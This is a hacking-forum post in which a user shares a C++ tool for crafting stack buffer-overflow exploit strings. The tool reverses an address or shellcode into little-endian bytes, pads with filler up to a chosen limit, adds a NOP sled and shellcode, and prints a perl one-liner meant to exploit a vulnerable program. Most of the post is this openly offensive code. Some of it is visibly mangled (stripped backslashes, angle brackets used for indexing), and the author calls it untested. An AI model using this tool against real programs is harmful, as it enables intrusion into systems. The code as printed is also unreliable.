Wednesday, 2017-12-13, 3:54 PM
Welcome Guest

Sec_rity without U

Main | Buffer Overflow Tools C++ | BigBadWolf - Forum | Registration | Login | RSS
[ New messages · Members · Forum rules · Search · RSS ]
Page 1 of 11
Forum » Coding » Codeing & Programming » Buffer Overflow Tools C++ | BigBadWolf
Buffer Overflow Tools C++ | BigBadWolf
BigBadWolfDate: Friday, 2012-02-17, 7:52 AM | Message # 1
Private
Group: Moderators
Messages: 19
Awards: 1
Reputation: 0
Status: Offline
I've written a fairly small buffer overflow tool to help your buffer overflow testing and exploiting go faster. It can be pretty annoying trying to retype everything when you are attempting to exploit a BOF vuln program. I created this tool with the intention of helping others spend less time crafting their BOF exploits and more time actually exploiting Icon_biggrin. Some the code is a bit sloppy since I was rushing through it and I'm aware that some of the things aren't really needed or could have been done using bitwise operators but in my opinion I think it's pretty good and I hope you enjoy it.
Code

#include <iostream>
#include <string>
#include <stdio.h>
#include <cstring>
using namespace std;

int main()
{
     //Written by BreakingSec.org
     //Please give credit if you edit or change this code to Breaking Secuirty
     //Have fun and sorry If it's not to well coded I was in a rush and used a lot of shortcuts.
     //Input
     cout << "n---------------------------------nThis tool helps you craft your buffer overflow attacks on the fly n";
     cout << "This tool gives you the ability to easly convert memory addressnor even shellcode into little endian formatn";
     cout << "This tool can help you create those annoying to craft buffer overnexploitation strings and helps your easly testn";
     cout << "and exploit BOF vulnerable programs.n";
     cout << "nIf you don't want to use one of the optionsn";
     cout << "simply put a 0 in the feild.n---------------------------------nn";
     string input;
     int limit = 0;
     int nopsledsize = 0;
     string shellcode;
     cout << "Enter address or shellcode to convert: ";
     cin >> input;
     cout << "Enter BOF limit as an integer: ";
     cin >> limit;
     cout << "Enter desired NOP sled length: ";
     cin >> nopsledsize;
     cout << "Enter desired normal shellcode: ";
     cin >> shellcode;
     //Find the end of inputed text
     int End = input.size();
     cout << End << "n";
     //Check if input is odd or even so we can add a 0 to the text to get the correct output ;D
     int Size = input.size();
     double Check = input.size();
     Check = Check / 2;
     int Verify = Size / 2;
     cout << Check << "n" << Verify << "n";
     if (Check == Verify)
     {
         cout << "Is an even number!n";
     }
     else
     {
         cout << "Is not an even number!n";
         string zero = "0";
         input.append(zero);
         Size = input.size();
         End = input.size();
         cout << "nn" << End << "nn" << Size << "nn" << input << "nn";
     }
     //That took a while xD
     int NextNumber;
     string final;
         int counter = 0;
     //check if it's zero
     if(input<2> == 00)
     {
         counter = Size;
     }
     //Create while loop to change order
     while(Size>counter)
     {
         End = End - 1;
         NextNumber = End - 1;
         cout << input.size() << "n";
         final = final + "x" + input<NextNumber> + input<End>;
         End = NextNumber;
         counter++;
         //Keeping it all clean ;D
         if (input<NextNumber>==NULL||input<End>==NULL)
         {
             counter = Size;
         }
     }
     //Now it's time for the BOF limit overflower
     int limitcount = 0;
     string overthetop;
     if(limit==0)
     {
         limitcount = limit;
     }
     while(limit>limitcount)
     {
         overthetop = overthetop + "A";
         limitcount++;
     }
     //Now it's time for the NOP sled
     int nopcount = 0;
     if(nopsledsize==0)
     {
         nopcount = nopsledsize;
     }
     string NOPsled;
     while(nopsledsize>nopcount)
     {
         NOPsled = NOPsled + "" + "x90";
         nopcount++;
     }
  cout << "nCompleted... nnFinal output:n-----------------------------------------n" ;;
         cout << "n`perl -e 'print "" << overthetop << NOPsled << final << shellcode << ""'`nn--------------------------------------- --n";
}


It outputs a perl command which will exploit the Buffer overflow prone program if used correctly, I haven't necessarily tested it and it's still in its testing stages but I hope to shorten up some of the code and tidy up a bit real soon, until then I hope you find the above code both useful and exciting.
 
Forum » Coding » Codeing & Programming » Buffer Overflow Tools C++ | BigBadWolf
Page 1 of 11
Search: